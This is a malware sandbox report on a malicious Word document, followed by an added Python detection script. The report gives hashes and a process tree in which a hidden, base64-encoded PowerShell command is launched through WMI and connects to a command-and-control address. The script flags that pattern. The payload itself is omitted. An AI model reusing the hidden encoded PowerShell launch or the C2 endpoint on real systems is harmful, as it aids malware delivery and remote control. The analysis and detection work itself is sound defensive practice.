File name: | 836ffe62de205e503c1f2b9a8fd9032f2d8e18b18fd928faccd24c8a07e7c854.doc |
Full analysis: | https://app.any.run/tasks/6ac7d1d1-dff5-48b6-8583-daa37918a4e3 |
Verdict: | Malicious activity |
Analysis date: | July 18, 2019, 01:43:33 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | -
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: user, Template: Normal.dotm, Last Saved By: user, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Sat Jul 13 19:39:00 2019, Last Saved Time/Date: Sat Jul 13 19:39:00 2019, Number of Pages: 1, Number of Words: 194, Number of Characters: 1107, Security: 0 |
MD5: | FE546B0F5BF8AE3EDDB5F91C92426C19 |
SHA1: | DCE8431D2F69AD3DC9BB260E4670397B08572616 |
SHA256: | 836FFE62DE205E503C1F2B9A8FD9032F2D8E18B18FD928FACCD24C8A07E7C854 |
SSDEEP: | 384:tIzxcgyGcS2rBQsyDk0jk87FnHhChUehoMqItF51Vc:OcdrSIjCnBChVho9e |
Extension | TrID match (probability, %)
---|---
.doc | Microsoft Word document (45.7)
.xls | Microsoft Excel sheet (42.8)
CompObjUserType: | Microsoft Office Word 97-2003 Document
CompObjUserTypeLen: | 39
Hyperlinks: | -
CodePage: | Windows Latin 1 (Western European) |
HeadingPairs: | -
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 12 |
CharCountWithSpaces: | 1299 |
Paragraphs: | 2 |
Lines: | 9 |
Company: | - |
Security: | None |
Characters: | 1107 |
Words: | 194 |
Pages: | 1 |
ModifyDate: | 2019:07:13 18:39:00 |
CreateDate: | 2019:07:13 18:39:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 2 |
LastModifiedBy: | user |
Template: | Normal.dotm |
Author: | user |
PID | CMD | Path | Indicators | Parent process
---|---|---|---|---
3476 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\836ffe62de205e503c1f2b9a8fd9032f2d8e18b18fd928faccd24c8a07e7c854.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe
User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM | Description: Microsoft Word | Version: 14.0.6024.1000
3180 | powershell.exe -WindowStyle hidden -nologo -noprofile -e [base64 encoded command not reproduced] | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | wmiprvse.exe
User: admin | Company: Microsoft Corporation | Integrity Level: MEDIUM | Description: Windows PowerShell | Version: 6.1.7600.16385 (win7_rtm.090713-1255)
PID | Process | Filename | Type
---|---|---|---
3476 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRE8DB.tmp.cvr | —
MD5: — | SHA256: —
3180 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\I2JK1H2XHNKBOGSKBB6X.temp | —
MD5: — | SHA256: —
3476 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc
MD5: 337FDB5F9D3D8ACDB831AEE7056AB95A | SHA256: 76EC22F04E278DC6115BCB0A5A49300AE44AEC5B1AE1B9EBD30F22D0CACB614D
3180 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF10f1d4.TMP | binary
MD5: 4B92A079D7F4DFA0DFE9125E60FE7814 | SHA256: E96B52BC25AE8BA162760C1F5159606ED78EB1EC4CBA0F98AAD2915AE22D8E04
3180 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary
MD5: 4B92A079D7F4DFA0DFE9125E60FE7814 | SHA256: E96B52BC25AE8BA162760C1F5159606ED78EB1EC4CBA0F98AAD2915AE22D8E04
3476 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$6ffe62de205e503c1f2b9a8fd9032f2d8e18b18fd928faccd24c8a07e7c854.doc | pgc
MD5: CA08A6FA645607E87D00E34680096C83 | SHA256: 9CC5D139624ADCE5BAAEF25DA11FCD5EAA709901CFD5161B8DD872D70DB9924A
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
— | — | 134.209.145.174:1337 | — | — | US | unknown |
3180 | powershell.exe | 134.209.145.174:1337 | — | — | US | unknown |
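The process table and the network table above together describe the execution chain worth detecting: WINWORD.EXE opens the document, and powershell.exe (PID 3180) starts with a hidden window, no profile and a base64 encoded command, then connects to 134.209.145.174:1337. Its parent is wmiprvse.exe, not WINWORD.EXE, which is what a process tree looks like when the macro launches its payload through WMI rather than a direct child process, so a rule keyed only on "Office spawns PowerShell" misses it. The following detection logic is an added example written for this page, not ANY.RUN's own code or the sample's payload. The record layout (Sysmon Event ID 1 style fields `pid`, `image`, `parent_image`, `command_line`, plus `dst_ip`/`dst_port` for connections), the full paths of explorer.exe and wmiprvse.exe, the benign PID 4100 baseline and the `Write-Output` payload standing in for the removed encoded command are all constructed assumptions; the PIDs, image paths, command-line switches and the C2 socket come from the report.

```python
"""Flag WMI-spawned, hidden, encoded PowerShell and a known C2 socket.

Added example for this report; sample records below are constructed in a
Sysmon Event ID 1 style (field names are an assumption, not the sandbox's
own export format).
"""
import base64
import re
from typing import Dict, List, Optional

# Destination taken from the report's network table.
SANDBOX_C2 = {("134.209.145.174", 1337)}

# Any prefix of -WindowStyle (e.g. -w, -win) followed by "hidden".
HIDDEN_RE = re.compile(r"-w\S*\s+hidden\b", re.I)


def _is_encoded_switch(token: str) -> bool:
    """PowerShell accepts any unambiguous prefix of a parameter name, so
    -e, -ec, -enc and -EncodedCommand all select EncodedCommand."""
    if len(token) < 2 or token[0] not in "-/":
        return False
    return "encodedcommand".startswith(token[1:].lower())


def decode_encoded_command(command_line: str) -> Optional[str]:
    """Return the UTF-16LE script behind -e/-enc/-EncodedCommand, or None
    when the switch is absent or the argument is not valid base64."""
    tokens = command_line.split()
    for i, tok in enumerate(tokens[:-1]):
        if _is_encoded_switch(tok):
            try:
                raw = base64.b64decode(tokens[i + 1], validate=True)
                return raw.decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
                return None
    return None


def inspect_process(rec: Dict[str, object]) -> List[str]:
    """Findings for one process-creation record (empty list = nothing seen)."""
    image = str(rec["image"]).rsplit("\\", 1)[-1].lower()
    parent = str(rec["parent_image"]).rsplit("\\", 1)[-1].lower()
    cmd = str(rec["command_line"])
    findings: List[str] = []
    if image != "powershell.exe":
        return findings
    if parent == "wmiprvse.exe":
        findings.append("wmi-parent: PowerShell launched via WMI, Office parent not in tree")
    if HIDDEN_RE.search(cmd):
        findings.append("hidden-window")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        findings.append(f"encoded-command: {decoded}")
    return findings


def inspect_connection(conn: Dict[str, object]) -> List[str]:
    if (str(conn["dst_ip"]), int(conn["dst_port"])) in SANDBOX_C2:
        return [f"c2-socket: {conn['dst_ip']}:{conn['dst_port']}"]
    return []


def analyze(processes, connections) -> Dict[int, List[str]]:
    """Map PID -> findings; PIDs with nothing suspicious are omitted."""
    report: Dict[int, List[str]] = {}
    for rec in processes:
        if (f := inspect_process(rec)):
            report.setdefault(int(rec["pid"]), []).extend(f)
    for conn in connections:
        if (f := inspect_connection(conn)):
            report.setdefault(int(conn["pid"]), []).extend(f)
    return report


# Constructed harmless stand-in for the encoded command the page omits.
SAMPLE_PAYLOAD = 'Write-Output "constructed sample"'
SAMPLE_ENCODED = base64.b64encode(SAMPLE_PAYLOAD.encode("utf-16-le")).decode("ascii")

SAMPLE_PROCESSES = [
    {"pid": 3476,
     "image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "parent_image": r"C:\Windows\explorer.exe",  # path assumed; report names explorer.exe only
     "command_line": r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n '
                     r'"C:\Users\admin\AppData\Local\Temp\836ffe62de205e503c1f2b9a8fd9032f2d8e18b18fd928faccd24c8a07e7c854.doc"'},
    {"pid": 3180,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\wbem\wmiprvse.exe",  # path assumed; report names wmiprvse.exe only
     "command_line": "powershell.exe -WindowStyle hidden -nologo -noprofile -e " + SAMPLE_ENCODED},
    # Constructed benign baseline: interactive PowerShell from the desktop shell.
    {"pid": 4100,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe -noprofile Get-Date"},
]
SAMPLE_CONNECTIONS = [
    {"pid": 3180, "dst_ip": "134.209.145.174", "dst_port": 1337},  # from the report
    {"pid": 4100, "dst_ip": "192.0.2.10", "dst_port": 443},        # constructed, RFC 5737 address
]

if __name__ == "__main__":
    for pid, findings in sorted(analyze(SAMPLE_PROCESSES, SAMPLE_CONNECTIONS).items()):
        print(pid)
        for line in findings:
            print("   ", line)
```

Only PID 3180 is reported: the WMI parent, the hidden window, the decoded script and the 134.209.145.174:1337 connection all attach to it, while the constructed interactive `-noprofile Get-Date` session produces nothing. Decoding the `-e` argument at detection time matters because the switch hides the script from plain command-line keyword matching; on a real host the decoded text is what you would feed to further content rules.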